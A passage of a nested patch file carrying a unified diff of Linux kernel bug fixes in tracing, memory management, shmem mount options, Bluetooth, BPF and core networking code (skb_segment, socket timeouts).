++	    is_cfi_preamble_symbol((unsigned long)p->addr)) {
+ 		ret = -EINVAL;
+ 		goto out;
+ 	}
+diff --git a/kernel/printk/printk_ringbuffer.c b/kernel/printk/printk_ringbuffer.c
+index 2b7b6ddab4f70..0bbcd1344f218 100644
+--- a/kernel/printk/printk_ringbuffer.c
++++ b/kernel/printk/printk_ringbuffer.c
+@@ -1735,7 +1735,7 @@ static bool copy_data(struct prb_data_ring *data_ring,
+ 	if (!buf || !buf_size)
+ 		return true;
+ 
+-	data_size = min_t(u16, buf_size, len);
++	data_size = min_t(unsigned int, buf_size, len);
+ 
+ 	memcpy(&buf[0], data, data_size); /* LMM(copy_data:A) */
+ 	return true;
+diff --git a/kernel/rcu/refscale.c b/kernel/rcu/refscale.c
+index d49a9d66e0000..3a93c53f615f0 100644
+--- a/kernel/rcu/refscale.c
++++ b/kernel/rcu/refscale.c
+@@ -867,12 +867,11 @@ ref_scale_init(void)
+ 	VERBOSE_SCALEOUT("Starting %d reader threads", nreaders);
+ 
+ 	for (i = 0; i < nreaders; i++) {
++		init_waitqueue_head(&reader_tasks[i].wq);
+ 		firsterr = torture_create_kthread(ref_scale_reader, (void *)i,
+ 						  reader_tasks[i].task);
+ 		if (torture_init_error(firsterr))
+ 			goto unwind;
+-
+-		init_waitqueue_head(&(reader_tasks[i].wq));
+ 	}
+ 
+ 	// Main Task
+diff --git a/kernel/resource.c b/kernel/resource.c
+index 1aeeededdd4c8..8f52f88009652 100644
+--- a/kernel/resource.c
++++ b/kernel/resource.c
+@@ -1693,18 +1693,15 @@ static int strict_iomem_checks;
+  *
+  * Returns true if exclusive to the kernel, otherwise returns false.
+  */
+-bool iomem_is_exclusive(u64 addr)
++bool resource_is_exclusive(struct resource *root, u64 addr, resource_size_t size)
+ {
+ 	const unsigned int exclusive_system_ram = IORESOURCE_SYSTEM_RAM |
+ 						  IORESOURCE_EXCLUSIVE;
+ 	bool skip_children = false, err = false;
+-	int size = PAGE_SIZE;
+ 	struct resource *p;
+ 
+-	addr = addr & PAGE_MASK;
+-
+ 	read_lock(&resource_lock);
+-	for_each_resource(&iomem_resource, p, skip_children) {
++	for_each_resource(root, p, skip_children) {
+ 		if (p->start >= addr + size)
+ 			break;
+ 		if (p->end < addr) {
+@@ -1743,6 +1740,12 @@ bool iomem_is_exclusive(u64 addr)
+ 	return err;
+ }
+ 
++bool iomem_is_exclusive(u64 addr)
++{
++	return resource_is_exclusive(&iomem_resource, addr & PAGE_MASK,
++				     PAGE_SIZE);
++}
++
+ struct resource_entry *resource_list_create_entry(struct resource *res,
+ 						  size_t extra_size)
+ {
+diff --git a/kernel/sched/rt.c b/kernel/sched/rt.c
+index 4f5796dd26a56..576eb2f51f043 100644
+--- a/kernel/sched/rt.c
++++ b/kernel/sched/rt.c
+@@ -25,7 +25,7 @@ unsigned int sysctl_sched_rt_period = 1000000;
+ int sysctl_sched_rt_runtime = 950000;
+ 
+ #ifdef CONFIG_SYSCTL
+-static int sysctl_sched_rr_timeslice = (MSEC_PER_SEC / HZ) * RR_TIMESLICE;
++static int sysctl_sched_rr_timeslice = (MSEC_PER_SEC * RR_TIMESLICE) / HZ;
+ static int sched_rt_handler(struct ctl_table *table, int write, void *buffer,
+ 		size_t *lenp, loff_t *ppos);
+ static int sched_rr_handler(struct ctl_table *table, int write, void *buffer,
+diff --git a/kernel/time/tick-sched.c b/kernel/time/tick-sched.c
+index 1ad89eec2a55f..798e1841d2863 100644
+--- a/kernel/time/tick-sched.c
++++ b/kernel/time/tick-sched.c
+@@ -1050,7 +1050,7 @@ static bool report_idle_softirq(void)
+ 		return false;
+ 
+ 	/* On RT, softirqs handling may be waiting on some lock */
+-	if (!local_bh_blocked())
++	if (local_bh_blocked())
+ 		return false;
+ 
+ 	pr_warn("NOHZ tick-stop error: local softirq work is pending, handler #%02x!!!\n",
+diff --git a/kernel/trace/bpf_trace.c b/kernel/trace/bpf_trace.c
+index ad04390883ada..9fc5db194027b 100644
+--- a/kernel/trace/bpf_trace.c
++++ b/kernel/trace/bpf_trace.c
+@@ -2390,7 +2390,7 @@ int bpf_get_perf_event_info(const struct perf_event *event, u32 *prog_id,
+ #ifdef CONFIG_UPROBE_EVENTS
+ 		if (flags & TRACE_EVENT_FL_UPROBE)
+ 			err = bpf_get_uprobe_info(event, fd_type, buf,
+-						  probe_offset,
++						  probe_offset, probe_addr,
+ 						  event->attr.type == PERF_TYPE_TRACEPOINT);
+ #endif
+ 	}
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index 1a87cb70f1eb5..54ccdca395311 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -6616,10 +6616,36 @@ tracing_max_lat_write(struct file *filp, const char __user *ubuf,
+ 
+ #endif
+ 
++static int open_pipe_on_cpu(struct trace_array *tr, int cpu)
++{
++	if (cpu == RING_BUFFER_ALL_CPUS) {
++		if (cpumask_empty(tr->pipe_cpumask)) {
++			cpumask_setall(tr->pipe_cpumask);
++			return 0;
++		}
++	} else if (!cpumask_test_cpu(cpu, tr->pipe_cpumask)) {
++		cpumask_set_cpu(cpu, tr->pipe_cpumask);
++		return 0;
++	}
++	return -EBUSY;
++}
++
++static void close_pipe_on_cpu(struct trace_array *tr, int cpu)
++{
++	if (cpu == RING_BUFFER_ALL_CPUS) {
++		WARN_ON(!cpumask_full(tr->pipe_cpumask));
++		cpumask_clear(tr->pipe_cpumask);
++	} else {
++		WARN_ON(!cpumask_test_cpu(cpu, tr->pipe_cpumask));
++		cpumask_clear_cpu(cpu, tr->pipe_cpumask);
++	}
++}
++
+ static int tracing_open_pipe(struct inode *inode, struct file *filp)
+ {
+ 	struct trace_array *tr = inode->i_private;
+ 	struct trace_iterator *iter;
++	int cpu;
+ 	int ret;
+ 
+ 	ret = tracing_check_open_get_tr(tr);
+@@ -6627,13 +6653,16 @@ static int tracing_open_pipe(struct inode *inode, struct file *filp)
+ 		return ret;
+ 
+ 	mutex_lock(&trace_types_lock);
++	cpu = tracing_get_cpu(inode);
++	ret = open_pipe_on_cpu(tr, cpu);
++	if (ret)
++		goto fail_pipe_on_cpu;
+ 
+ 	/* create a buffer to store the information to pass to userspace */
+ 	iter = kzalloc(sizeof(*iter), GFP_KERNEL);
+ 	if (!iter) {
+ 		ret = -ENOMEM;
+-		__trace_array_put(tr);
+-		goto out;
++		goto fail_alloc_iter;
+ 	}
+ 
+ 	trace_seq_init(&iter->seq);
+@@ -6656,7 +6685,7 @@ static int tracing_open_pipe(struct inode *inode, struct file *filp)
+ 
+ 	iter->tr = tr;
+ 	iter->array_buffer = &tr->array_buffer;
+-	iter->cpu_file = tracing_get_cpu(inode);
++	iter->cpu_file = cpu;
+ 	mutex_init(&iter->mutex);
+ 	filp->private_data = iter;
+ 
+@@ -6666,12 +6695,15 @@ static int tracing_open_pipe(struct inode *inode, struct file *filp)
+ 	nonseekable_open(inode, filp);
+ 
+ 	tr->trace_ref++;
+-out:
++
+ 	mutex_unlock(&trace_types_lock);
+ 	return ret;
+ 
+ fail:
+ 	kfree(iter);
++fail_alloc_iter:
++	close_pipe_on_cpu(tr, cpu);
++fail_pipe_on_cpu:
+ 	__trace_array_put(tr);
+ 	mutex_unlock(&trace_types_lock);
+ 	return ret;
+@@ -6688,7 +6720,7 @@ static int tracing_release_pipe(struct inode *inode, struct file *file)
+ 
+ 	if (iter->trace->pipe_close)
+ 		iter->trace->pipe_close(iter);
+-
++	close_pipe_on_cpu(tr, iter->cpu_file);
+ 	mutex_unlock(&trace_types_lock);
+ 
+ 	free_cpumask_var(iter->started);
+@@ -7484,6 +7516,11 @@ out:
+ 	return ret;
+ }
+ 
++static void tracing_swap_cpu_buffer(void *tr)
++{
++	update_max_tr_single((struct trace_array *)tr, current, smp_processor_id());
++}
++
+ static ssize_t
+ tracing_snapshot_write(struct file *filp, const char __user *ubuf, size_t cnt,
+ 		       loff_t *ppos)
+@@ -7542,13 +7579,15 @@ tracing_snapshot_write(struct file *filp, const char __user *ubuf, size_t cnt,
+ 			ret = tracing_alloc_snapshot_instance(tr);
+ 		if (ret < 0)
+ 			break;
+-		local_irq_disable();
+ 		/* Now, we're going to swap */
+-		if (iter->cpu_file == RING_BUFFER_ALL_CPUS)
++		if (iter->cpu_file == RING_BUFFER_ALL_CPUS) {
++			local_irq_disable();
+ 			update_max_tr(tr, current, smp_processor_id(), NULL);
+-		else
+-			update_max_tr_single(tr, current, iter->cpu_file);
+-		local_irq_enable();
++			local_irq_enable();
++		} else {
++			smp_call_function_single(iter->cpu_file, tracing_swap_cpu_buffer,
++						 (void *)tr, 1);
++		}
+ 		break;
+ 	default:
+ 		if (tr->allocated_snapshot) {
+@@ -9356,6 +9395,9 @@ static struct trace_array *trace_array_create(const char *name)
+ 	if (!alloc_cpumask_var(&tr->tracing_cpumask, GFP_KERNEL))
+ 		goto out_free_tr;
+ 
++	if (!zalloc_cpumask_var(&tr->pipe_cpumask, GFP_KERNEL))
++		goto out_free_tr;
++
+ 	tr->trace_flags = global_trace.trace_flags & ~ZEROED_TRACE_FLAGS;
+ 
+ 	cpumask_copy(tr->tracing_cpumask, cpu_all_mask);
+@@ -9397,6 +9439,7 @@ static struct trace_array *trace_array_create(const char *name)
+  out_free_tr:
+ 	ftrace_free_ftrace_ops(tr);
+ 	free_trace_buffers(tr);
++	free_cpumask_var(tr->pipe_cpumask);
+ 	free_cpumask_var(tr->tracing_cpumask);
+ 	kfree(tr->name);
+ 	kfree(tr);
+@@ -9499,6 +9542,7 @@ static int __remove_instance(struct trace_array *tr)
+ 	}
+ 	kfree(tr->topts);
+ 
++	free_cpumask_var(tr->pipe_cpumask);
+ 	free_cpumask_var(tr->tracing_cpumask);
+ 	kfree(tr->name);
+ 	kfree(tr);
+@@ -10223,12 +10267,14 @@ __init static int tracer_alloc_buffers(void)
+ 	if (trace_create_savedcmd() < 0)
+ 		goto out_free_temp_buffer;
+ 
++	if (!zalloc_cpumask_var(&global_trace.pipe_cpumask, GFP_KERNEL))
++		goto out_free_savedcmd;
++
+ 	/* TODO: make the number of buffers hot pluggable with CPUS */
+ 	if (allocate_trace_buffers(&global_trace, ring_buf_size) < 0) {
+ 		MEM_FAIL(1, "tracer: failed to allocate ring buffer!\n");
+-		goto out_free_savedcmd;
++		goto out_free_pipe_cpumask;
+ 	}
+-
+ 	if (global_trace.buffer_disabled)
+ 		tracing_off();
+ 
+@@ -10281,6 +10327,8 @@ __init static int tracer_alloc_buffers(void)
+ 
+ 	return 0;
+ 
++out_free_pipe_cpumask:
++	free_cpumask_var(global_trace.pipe_cpumask);
+ out_free_savedcmd:
+ 	free_saved_cmdlines_buffer(savedcmd);
+ out_free_temp_buffer:
+diff --git a/kernel/trace/trace.h b/kernel/trace/trace.h
+index 3d3505286aa7f..dbb86b0dd3b7b 100644
+--- a/kernel/trace/trace.h
++++ b/kernel/trace/trace.h
+@@ -366,6 +366,8 @@ struct trace_array {
+ 	struct list_head	events;
+ 	struct trace_event_file *trace_marker_file;
+ 	cpumask_var_t		tracing_cpumask; /* only trace on set CPUs */
++	/* one per_cpu trace_pipe can be opened by only one user */
++	cpumask_var_t		pipe_cpumask;
+ 	int			ref;
+ 	int			trace_ref;
+ #ifdef CONFIG_FUNCTION_TRACER
+diff --git a/kernel/trace/trace_hwlat.c b/kernel/trace/trace_hwlat.c
+index 2f37a6e68aa9f..b791524a6536a 100644
+--- a/kernel/trace/trace_hwlat.c
++++ b/kernel/trace/trace_hwlat.c
+@@ -635,7 +635,7 @@ static int s_mode_show(struct seq_file *s, void *v)
+ 	else
+ 		seq_printf(s, "%s", thread_mode_str[mode]);
+ 
+-	if (mode != MODE_MAX)
++	if (mode < MODE_MAX - 1) /* if mode is any but last */
+ 		seq_puts(s, " ");
+ 
+ 	return 0;
+diff --git a/kernel/trace/trace_uprobe.c b/kernel/trace/trace_uprobe.c
+index 2ac06a642863a..127c78aec17db 100644
+--- a/kernel/trace/trace_uprobe.c
++++ b/kernel/trace/trace_uprobe.c
+@@ -1418,7 +1418,7 @@ static void uretprobe_perf_func(struct trace_uprobe *tu, unsigned long func,
+ 
+ int bpf_get_uprobe_info(const struct perf_event *event, u32 *fd_type,
+ 			const char **filename, u64 *probe_offset,
+-			bool perf_type_tracepoint)
++			u64 *probe_addr, bool perf_type_tracepoint)
+ {
+ 	const char *pevent = trace_event_name(event->tp_event);
+ 	const char *group = event->tp_event->class->system;
+@@ -1435,6 +1435,7 @@ int bpf_get_uprobe_info(const struct perf_event *event, u32 *fd_type,
+ 				    : BPF_FD_TYPE_UPROBE;
+ 	*filename = tu->filename;
+ 	*probe_offset = tu->offset;
++	*probe_addr = 0;
+ 	return 0;
+ }
+ #endif	/* CONFIG_PERF_EVENTS */
+diff --git a/lib/xarray.c b/lib/xarray.c
+index ea9ce1f0b3863..e9bd29826e8b0 100644
+--- a/lib/xarray.c
++++ b/lib/xarray.c
+@@ -204,7 +204,7 @@ static void *xas_descend(struct xa_state *xas, struct xa_node *node)
+ 	void *entry = xa_entry(xas->xa, node, offset);
+ 
+ 	xas->xa_node = node;
+-	if (xa_is_sibling(entry)) {
++	while (xa_is_sibling(entry)) {
+ 		offset = xa_to_sibling(entry);
+ 		entry = xa_entry(xas->xa, node, offset);
+ 		if (node->shift && xa_is_node(entry))
+diff --git a/mm/shmem.c b/mm/shmem.c
+index 10365ced5b1fc..806741bbe4a68 100644
+--- a/mm/shmem.c
++++ b/mm/shmem.c
+@@ -3485,6 +3485,8 @@ static int shmem_parse_one(struct fs_context *fc, struct fs_parameter *param)
+ 	unsigned long long size;
+ 	char *rest;
+ 	int opt;
++	kuid_t kuid;
++	kgid_t kgid;
+ 
+ 	opt = fs_parse(fc, shmem_fs_parameters, param, &result);
+ 	if (opt < 0)
+@@ -3520,14 +3522,32 @@ static int shmem_parse_one(struct fs_context *fc, struct fs_parameter *param)
+ 		ctx->mode = result.uint_32 & 07777;
+ 		break;
+ 	case Opt_uid:
+-		ctx->uid = make_kuid(current_user_ns(), result.uint_32);
+-		if (!uid_valid(ctx->uid))
++		kuid = make_kuid(current_user_ns(), result.uint_32);
++		if (!uid_valid(kuid))
+ 			goto bad_value;
++
++		/*
++		 * The requested uid must be representable in the
++		 * filesystem's idmapping.
++		 */
++		if (!kuid_has_mapping(fc->user_ns, kuid))
++			goto bad_value;
++
++		ctx->uid = kuid;
+ 		break;
+ 	case Opt_gid:
+-		ctx->gid = make_kgid(current_user_ns(), result.uint_32);
+-		if (!gid_valid(ctx->gid))
++		kgid = make_kgid(current_user_ns(), result.uint_32);
++		if (!gid_valid(kgid))
+ 			goto bad_value;
++
++		/*
++		 * The requested gid must be representable in the
++		 * filesystem's idmapping.
++		 */
++		if (!kgid_has_mapping(fc->user_ns, kgid))
++			goto bad_value;
++
++		ctx->gid = kgid;
+ 		break;
+ 	case Opt_huge:
+ 		ctx->huge = result.uint_32;
+diff --git a/mm/util.c b/mm/util.c
+index 12984e76767eb..ce3bb17c97b9d 100644
+--- a/mm/util.c
++++ b/mm/util.c
+@@ -1127,7 +1127,9 @@ void mem_dump_obj(void *object)
+ 	if (vmalloc_dump_obj(object))
+ 		return;
+ 
+-	if (virt_addr_valid(object))
++	if (is_vmalloc_addr(object))
++		type = "vmalloc memory";
++	else if (virt_addr_valid(object))
+ 		type = "non-slab/vmalloc memory";
+ 	else if (object == NULL)
+ 		type = "NULL pointer";
+diff --git a/mm/vmalloc.c b/mm/vmalloc.c
+index 80bd104a4d42e..67a10a04df041 100644
+--- a/mm/vmalloc.c
++++ b/mm/vmalloc.c
+@@ -4041,14 +4041,32 @@ void pcpu_free_vm_areas(struct vm_struct **vms, int nr_vms)
+ #ifdef CONFIG_PRINTK
+ bool vmalloc_dump_obj(void *object)
+ {
+-	struct vm_struct *vm;
+ 	void *objp = (void *)PAGE_ALIGN((unsigned long)object);
++	const void *caller;
++	struct vm_struct *vm;
++	struct vmap_area *va;
++	unsigned long addr;
++	unsigned int nr_pages;
++
++	if (!spin_trylock(&vmap_area_lock))
++		return false;
++	va = __find_vmap_area((unsigned long)objp, &vmap_area_root);
++	if (!va) {
++		spin_unlock(&vmap_area_lock);
++		return false;
++	}
+ 
+-	vm = find_vm_area(objp);
+-	if (!vm)
++	vm = va->vm;
++	if (!vm) {
++		spin_unlock(&vmap_area_lock);
+ 		return false;
++	}
++	addr = (unsigned long)vm->addr;
++	caller = vm->caller;
++	nr_pages = vm->nr_pages;
++	spin_unlock(&vmap_area_lock);
+ 	pr_cont(" %u-page vmalloc region starting at %#lx allocated at %pS\n",
+-		vm->nr_pages, (unsigned long)vm->addr, vm->caller);
++		nr_pages, addr, caller);
+ 	return true;
+ }
+ #endif
+diff --git a/mm/vmpressure.c b/mm/vmpressure.c
+index b52644771cc43..22c6689d93027 100644
+--- a/mm/vmpressure.c
++++ b/mm/vmpressure.c
+@@ -244,6 +244,14 @@ void vmpressure(gfp_t gfp, struct mem_cgroup *memcg, bool tree,
+ 	if (mem_cgroup_disabled())
+ 		return;
+ 
++	/*
++	 * The in-kernel users only care about the reclaim efficiency
++	 * for this @memcg rather than the whole subtree, and there
++	 * isn't and won't be any in-kernel user in a legacy cgroup.
++	 */
++	if (!cgroup_subsys_on_dfl(memory_cgrp_subsys) && !tree)
++		return;
++
+ 	vmpr = memcg_to_vmpressure(memcg);
+ 
+ 	/*
+diff --git a/net/9p/trans_virtio.c b/net/9p/trans_virtio.c
+index 3f3eb03cda7d6..3cf660d8a0a7b 100644
+--- a/net/9p/trans_virtio.c
++++ b/net/9p/trans_virtio.c
+@@ -385,7 +385,7 @@ static void handle_rerror(struct p9_req_t *req, int in_hdr_len,
+ 	void *to = req->rc.sdata + in_hdr_len;
+ 
+ 	// Fits entirely into the static data?  Nothing to do.
+-	if (req->rc.size < in_hdr_len)
++	if (req->rc.size < in_hdr_len || !pages)
+ 		return;
+ 
+ 	// Really long error message?  Tough, truncate the reply.  Might get
+@@ -429,7 +429,7 @@ p9_virtio_zc_request(struct p9_client *client, struct p9_req_t *req,
+ 	struct page **in_pages = NULL, **out_pages = NULL;
+ 	struct virtio_chan *chan = client->trans;
+ 	struct scatterlist *sgs[4];
+-	size_t offs;
++	size_t offs = 0;
+ 	int need_drop = 0;
+ 	int kicked = 0;
+ 
+diff --git a/net/bluetooth/hci_core.c b/net/bluetooth/hci_core.c
+index d034bf2a999e1..146553c0054f6 100644
+--- a/net/bluetooth/hci_core.c
++++ b/net/bluetooth/hci_core.c
+@@ -1074,9 +1074,9 @@ void hci_uuids_clear(struct hci_dev *hdev)
+ 
+ void hci_link_keys_clear(struct hci_dev *hdev)
+ {
+-	struct link_key *key;
++	struct link_key *key, *tmp;
+ 
+-	list_for_each_entry(key, &hdev->link_keys, list) {
++	list_for_each_entry_safe(key, tmp, &hdev->link_keys, list) {
+ 		list_del_rcu(&key->list);
+ 		kfree_rcu(key, rcu);
+ 	}
+@@ -1084,9 +1084,9 @@ void hci_link_keys_clear(struct hci_dev *hdev)
+ 
+ void hci_smp_ltks_clear(struct hci_dev *hdev)
+ {
+-	struct smp_ltk *k;
++	struct smp_ltk *k, *tmp;
+ 
+-	list_for_each_entry(k, &hdev->long_term_keys, list) {
++	list_for_each_entry_safe(k, tmp, &hdev->long_term_keys, list) {
+ 		list_del_rcu(&k->list);
+ 		kfree_rcu(k, rcu);
+ 	}
+@@ -1094,9 +1094,9 @@ void hci_smp_ltks_clear(struct hci_dev *hdev)
+ 
+ void hci_smp_irks_clear(struct hci_dev *hdev)
+ {
+-	struct smp_irk *k;
++	struct smp_irk *k, *tmp;
+ 
+-	list_for_each_entry(k, &hdev->identity_resolving_keys, list) {
++	list_for_each_entry_safe(k, tmp, &hdev->identity_resolving_keys, list) {
+ 		list_del_rcu(&k->list);
+ 		kfree_rcu(k, rcu);
+ 	}
+@@ -1104,9 +1104,9 @@ void hci_smp_irks_clear(struct hci_dev *hdev)
+ 
+ void hci_blocked_keys_clear(struct hci_dev *hdev)
+ {
+-	struct blocked_key *b;
++	struct blocked_key *b, *tmp;
+ 
+-	list_for_each_entry(b, &hdev->blocked_keys, list) {
++	list_for_each_entry_safe(b, tmp, &hdev->blocked_keys, list) {
+ 		list_del_rcu(&b->list);
+ 		kfree_rcu(b, rcu);
+ 	}
+@@ -1949,15 +1949,15 @@ int hci_add_adv_monitor(struct hci_dev *hdev, struct adv_monitor *monitor)
+ 
+ 	switch (hci_get_adv_monitor_offload_ext(hdev)) {
+ 	case HCI_ADV_MONITOR_EXT_NONE:
+-		bt_dev_dbg(hdev, "%s add monitor %d status %d", hdev->name,
++		bt_dev_dbg(hdev, "add monitor %d status %d",
+ 			   monitor->handle, status);
+ 		/* Message was not forwarded to controller - not an error */
+ 		break;
+ 
+ 	case HCI_ADV_MONITOR_EXT_MSFT:
+ 		status = msft_add_monitor_pattern(hdev, monitor);
+-		bt_dev_dbg(hdev, "%s add monitor %d msft status %d", hdev->name,
+-			   monitor->handle, status);
++		bt_dev_dbg(hdev, "add monitor %d msft status %d",
++			   handle, status);
+ 		break;
+ 	}
+ 
+@@ -1976,15 +1976,15 @@ static int hci_remove_adv_monitor(struct hci_dev *hdev,
+ 
+ 	switch (hci_get_adv_monitor_offload_ext(hdev)) {
+ 	case HCI_ADV_MONITOR_EXT_NONE: /* also goes here when powered off */
+-		bt_dev_dbg(hdev, "%s remove monitor %d status %d", hdev->name,
++		bt_dev_dbg(hdev, "remove monitor %d status %d",
+ 			   monitor->handle, status);
+ 		goto free_monitor;
+ 
+ 	case HCI_ADV_MONITOR_EXT_MSFT:
+ 		handle = monitor->handle;
+ 		status = msft_remove_monitor(hdev, monitor);
+-		bt_dev_dbg(hdev, "%s remove monitor %d msft status %d",
+-			   hdev->name, handle, status);
++		bt_dev_dbg(hdev, "remove monitor %d msft status %d",
++			   handle, status);
+ 		break;
+ 	}
+ 
+diff --git a/net/bluetooth/iso.c b/net/bluetooth/iso.c
+index 699e4f400df29..5cd2e775915be 100644
+--- a/net/bluetooth/iso.c
++++ b/net/bluetooth/iso.c
+@@ -1394,7 +1394,7 @@ static int iso_sock_release(struct socket *sock)
+ 
+ 	iso_sock_close(sk);
+ 
+-	if (sock_flag(sk, SOCK_LINGER) && sk->sk_lingertime &&
++	if (sock_flag(sk, SOCK_LINGER) && READ_ONCE(sk->sk_lingertime) &&
+ 	    !(current->flags & PF_EXITING)) {
+ 		lock_sock(sk);
+ 		err = bt_sock_wait_state(sk, BT_CLOSED, sk->sk_lingertime);
+diff --git a/net/bluetooth/sco.c b/net/bluetooth/sco.c
+index 1755f91a66f6a..6d4168cfeb563 100644
+--- a/net/bluetooth/sco.c
++++ b/net/bluetooth/sco.c
+@@ -1255,7 +1255,7 @@ static int sco_sock_release(struct socket *sock)
+ 
+ 	sco_sock_close(sk);
+ 
+-	if (sock_flag(sk, SOCK_LINGER) && sk->sk_lingertime &&
++	if (sock_flag(sk, SOCK_LINGER) && READ_ONCE(sk->sk_lingertime) &&
+ 	    !(current->flags & PF_EXITING)) {
+ 		lock_sock(sk);
+ 		err = bt_sock_wait_state(sk, BT_CLOSED, sk->sk_lingertime);
+diff --git a/net/bridge/br_stp_if.c b/net/bridge/br_stp_if.c
+index b65962682771f..75204d36d7f90 100644
+--- a/net/bridge/br_stp_if.c
++++ b/net/bridge/br_stp_if.c
+@@ -201,9 +201,6 @@ int br_stp_set_enabled(struct net_bridge *br, unsigned long val,
+ {
+ 	ASSERT_RTNL();
+ 
+-	if (!net_eq(dev_net(br->dev), &init_net))
+-		NL_SET_ERR_MSG_MOD(extack, "STP does not work in non-root netns");
+-
+ 	if (br_mrp_enabled(br)) {
+ 		NL_SET_ERR_MSG_MOD(extack,
+ 				   "STP can't be enabled if MRP is already enabled");
+diff --git a/net/core/filter.c b/net/core/filter.c
+index 419ce7c61bd6b..9fd7c88b5db4e 100644
+--- a/net/core/filter.c
++++ b/net/core/filter.c
+@@ -7259,6 +7259,8 @@ BPF_CALL_3(bpf_sk_assign, struct sk_buff *, skb, struct sock *, sk, u64, flags)
+ 		return -ENETUNREACH;
+ 	if (unlikely(sk_fullsock(sk) && sk->sk_reuseport))
+ 		return -ESOCKTNOSUPPORT;
++	if (sk_unhashed(sk))
++		return -EOPNOTSUPP;
+ 	if (sk_is_refcounted(sk) &&
+ 	    unlikely(!refcount_inc_not_zero(&sk->sk_refcnt)))
+ 		return -ENOENT;
+diff --git a/net/core/lwt_bpf.c b/net/core/lwt_bpf.c
+index 8b6b5e72b2179..4a0797f0a154b 100644
+--- a/net/core/lwt_bpf.c
++++ b/net/core/lwt_bpf.c
+@@ -60,9 +60,8 @@ static int run_lwt_bpf(struct sk_buff *skb, struct bpf_lwt_prog *lwt,
+ 			ret = BPF_OK;
+ 		} else {
+ 			skb_reset_mac_header(skb);
+-			ret = skb_do_redirect(skb);
+-			if (ret == 0)
+-				ret = BPF_REDIRECT;
++			skb_do_redirect(skb);
++			ret = BPF_REDIRECT;
+ 		}
+ 		break;
+ 
+@@ -255,7 +254,7 @@ static int bpf_lwt_xmit_reroute(struct sk_buff *skb)
+ 
+ 	err = dst_output(dev_net(skb_dst(skb)->dev), skb->sk, skb);
+ 	if (unlikely(err))
+-		return err;
++		return net_xmit_errno(err);
+ 
+ 	/* ip[6]_finish_output2 understand LWTUNNEL_XMIT_DONE */
+ 	return LWTUNNEL_XMIT_DONE;
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index b6c16db86c719..24bf4aa222d27 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -4135,21 +4135,20 @@ struct sk_buff *skb_segment(struct sk_buff *head_skb,
+ 	struct sk_buff *segs = NULL;
+ 	struct sk_buff *tail = NULL;
+ 	struct sk_buff *list_skb = skb_shinfo(head_skb)->frag_list;
+-	skb_frag_t *frag = skb_shinfo(head_skb)->frags;
+ 	unsigned int mss = skb_shinfo(head_skb)->gso_size;
+ 	unsigned int doffset = head_skb->data - skb_mac_header(head_skb);
+-	struct sk_buff *frag_skb = head_skb;
+ 	unsigned int offset = doffset;
+ 	unsigned int tnl_hlen = skb_tnl_header_len(head_skb);
+ 	unsigned int partial_segs = 0;
+ 	unsigned int headroom;
+ 	unsigned int len = head_skb->len;
++	struct sk_buff *frag_skb;
++	skb_frag_t *frag;
+ 	__be16 proto;
+ 	bool csum, sg;
+-	int nfrags = skb_shinfo(head_skb)->nr_frags;
+ 	int err = -ENOMEM;
+ 	int i = 0;
+-	int pos;
++	int nfrags, pos;
+ 
+ 	if ((skb_shinfo(head_skb)->gso_type & SKB_GSO_DODGY) &&
+ 	    mss != GSO_BY_FRAGS && mss != skb_headlen(head_skb)) {
+@@ -4226,6 +4225,13 @@ normal:
+ 	headroom = skb_headroom(head_skb);
+ 	pos = skb_headlen(head_skb);
+ 
++	if (skb_orphan_frags(head_skb, GFP_ATOMIC))
++		return ERR_PTR(-ENOMEM);
++
++	nfrags = skb_shinfo(head_skb)->nr_frags;
++	frag = skb_shinfo(head_skb)->frags;
++	frag_skb = head_skb;
++
+ 	do {
+ 		struct sk_buff *nskb;
+ 		skb_frag_t *nskb_frag;
+@@ -4246,6 +4252,10 @@ normal:
+ 		    (skb_headlen(list_skb) == len || sg)) {
+ 			BUG_ON(skb_headlen(list_skb) > len);
+ 
++			nskb = skb_clone(list_skb, GFP_ATOMIC);
++			if (unlikely(!nskb))
++				goto err;
++
+ 			i = 0;
+ 			nfrags = skb_shinfo(list_skb)->nr_frags;
+ 			frag = skb_shinfo(list_skb)->frags;
+@@ -4264,12 +4274,8 @@ normal:
+ 				frag++;
+ 			}
+ 
+-			nskb = skb_clone(list_skb, GFP_ATOMIC);
+ 			list_skb = list_skb->next;
+ 
+-			if (unlikely(!nskb))
+-				goto err;
+-
+ 			if (unlikely(pskb_trim(nskb, len))) {
+ 				kfree_skb(nskb);
+ 				goto err;
+@@ -4345,12 +4351,16 @@ normal:
+ 		skb_shinfo(nskb)->flags |= skb_shinfo(head_skb)->flags &
+ 					   SKBFL_SHARED_FRAG;
+ 
+-		if (skb_orphan_frags(frag_skb, GFP_ATOMIC) ||
+-		    skb_zerocopy_clone(nskb, frag_skb, GFP_ATOMIC))
++		if (skb_zerocopy_clone(nskb, frag_skb, GFP_ATOMIC))
+ 			goto err;
+ 
+ 		while (pos < offset + len) {
+ 			if (i >= nfrags) {
++				if (skb_orphan_frags(list_skb, GFP_ATOMIC) ||
++				    skb_zerocopy_clone(nskb, list_skb,
++						       GFP_ATOMIC))
++					goto err;
++
+ 				i = 0;
+ 				nfrags = skb_shinfo(list_skb)->nr_frags;
+ 				frag = skb_shinfo(list_skb)->frags;
+@@ -4364,10 +4374,6 @@ normal:
+ 					i--;
+ 					frag--;
+ 				}
+-				if (skb_orphan_frags(frag_skb, GFP_ATOMIC) ||
+-				    skb_zerocopy_clone(nskb, frag_skb,
+-						       GFP_ATOMIC))
+-					goto err;
+ 
+ 				list_skb = list_skb->next;
+ 			}
+diff --git a/net/core/sock.c b/net/core/sock.c
+index 509773919d302..fc475845c94d5 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -425,6 +425,7 @@ static int sock_set_timeout(long *timeo_p, sockptr_t optval, int optlen,
+ {
+ 	struct __kernel_sock_timeval tv;
+ 	int err = sock_copy_user_timeval(&tv, optval, optlen, old_timeval);
++	long val;
+ 
+ 	if (err)
+ 		return err;
+@@ -435,7 +436,7 @@ static int sock_set_timeout(long *timeo_p, sockptr_t optval, int optlen,
+ 	if (tv.tv_sec < 0) {
+ 		static int warned __read_mostly;
+ 
+-		*timeo_p = 0;
++		WRITE_ONCE(*timeo_p, 0);
+ 		if (warned < 10 && net_ratelimit()) {
+ 			warned++;
+ 			pr_info("%s: `%s' (pid %d) tries to set negative timeout\n",
